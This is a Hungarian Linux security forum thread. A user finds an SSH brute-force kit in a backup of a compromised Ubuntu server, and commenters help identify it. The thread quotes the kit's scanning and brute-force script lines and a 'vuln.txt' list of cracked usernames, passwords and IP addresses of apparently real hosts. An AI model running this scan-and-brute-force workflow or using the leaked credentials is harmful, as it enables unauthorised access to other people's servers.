Címlap » Fórum » Biztonság » Linux-security

Avira 'LINUX/RootKIT/D' találat egy Ubuntu backupban

 ( Deacon | 2011. január 13., csütörtök - 15:48 )

Sziasztok! Nemrég készítettem mentést egy Ubuntu 8.04.4 LTS rendszerről (a fontosabb könyvtárakat egy még évekkel ezelőtt készített szkripttel bepakoltam egy tar.gz-be), aztán leszedtem a gépemre, ahonnan archiválhatom. De gondoltam, előtte mégiscsak kicsomagolom, és átnézem, van-e benne olyan, amit felesleges menteni... Aztán kicsomagolás közben szólt az Avira, hogy rootkit rejtőzik a fájlok között:

Az rkhunter és chkrootkit nem talált semmit, ellenben a "rai" könyvtárban van egy pár fájl, amiben román nyelvű szöveg is akad :S Első körben nem jutottam nyomára, mi a franc lehet ez, ha bárki útbaigazít, annak nagyon megköszönöm!

‹ w00tw00.at.* és társainak szimatolása ssh - RST Flood? ›
 »
  • A hozzászóláshoz belépés szükséges
  • 6882 olvasás

Hozzászólás megjelenítési lehetőségek

A választott hozzászólás megjelenítési mód a „Beállítás” gombbal rögzíthető.
( andrej_ (veterán) | 2011. január 13., csütörtök - 15:53 )

Node ez a go.sh mit csinál?

( muszi (veterán) | 2011. január 13., csütörtök - 16:43 )

Idézet:
van egy pár fájl, amiben román nyelvű szöveg is akad

Ha esetleg beidezned a szoveget, esetleg az egesz szkriptet...

( Deacon | 2011. január 13., csütörtök - 16:56 )

ilyen fájlokat találtam:

.scan.swp
97.pscan.22
mfu.txt
pass_file
ps
scan
ss
ssh-scan
vuln.txt

"go.sh" tartalma:

./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan
rm -f bios.txt

"scan" tartalma:

[...]
cat $1.pscan.22 |sort |uniq > mfu.txt
echo "${WHI}[${MAG}+${WHI}]${GRN} Incep Scannarea De User Pass ${RES}"
./ssh-scan 100
rm -rf $1.pscan.22
echo "${WHI}[+]${YEL} Aproape Ca Ai Reusit..Mai Incearca Alta Clasa.. ${RES}"
[...]

"vuln.txt":

root:marko:83.151.28.197
nicola:nicola:83.135.139.113

"ss" és "ssh-scan" bináris

( mn3monic (veterán) | 2011. január 13., csütörtök - 17:09 )

ahaha :)

( muszi (veterán) | 2011. január 13., csütörtök - 19:13 )

Idézet:
Incep Scannarea De User Pass

"Kezdem a felhasznalo jelszavanak szkenneleset (vegigprobalasat?)"

Idézet:
Aproape Ca Ai Reusit..Mai Incearca Alta Clasa..

"Majdnem sikerult.. Probalj meg egy masik (jelszo?)osztalyt is.."

Szerintem igaza van a virusolonek.

( Hunger | 2011. január 13., csütörtök - 17:01 )

YOU HAVE BEEN PWNED DUDE!!! XD

( ates2 | 2011. január 13., csütörtök - 17:15 )

A jó öreg ssh brute force cucc

( vector | 2011. január 13., csütörtök - 19:27 )

kölcsön tudnád adni?:))))))))

--------------------------------------------
blackPanther OS v11.1 * www.blackpanther.hu

( Pontscho | 2011. január 13., csütörtök - 19:52 )

A linuxos rootkitet vagy a windowsos appot amivel megtalalta? :)

---
pontscho / fresh!mindworkz

( vector | 2011. január 13., csütörtök - 20:40 )

természetesen a rootkit-et amit nem ismert az rkhunter :)) apropó, ezt le kéne jelenteni

( Deacon | 2011. január 14., péntek - 17:03 )

apropó, ezt le kéne jelenteni

Akkor már csak egy apró kérdés: hová lenne a legcélszerűbb?

( balintdavid | 2011. január 13., csütörtök - 20:00 )

subscribe
----------------
http://www.youtube.com/watch?v=1stW0J7Myew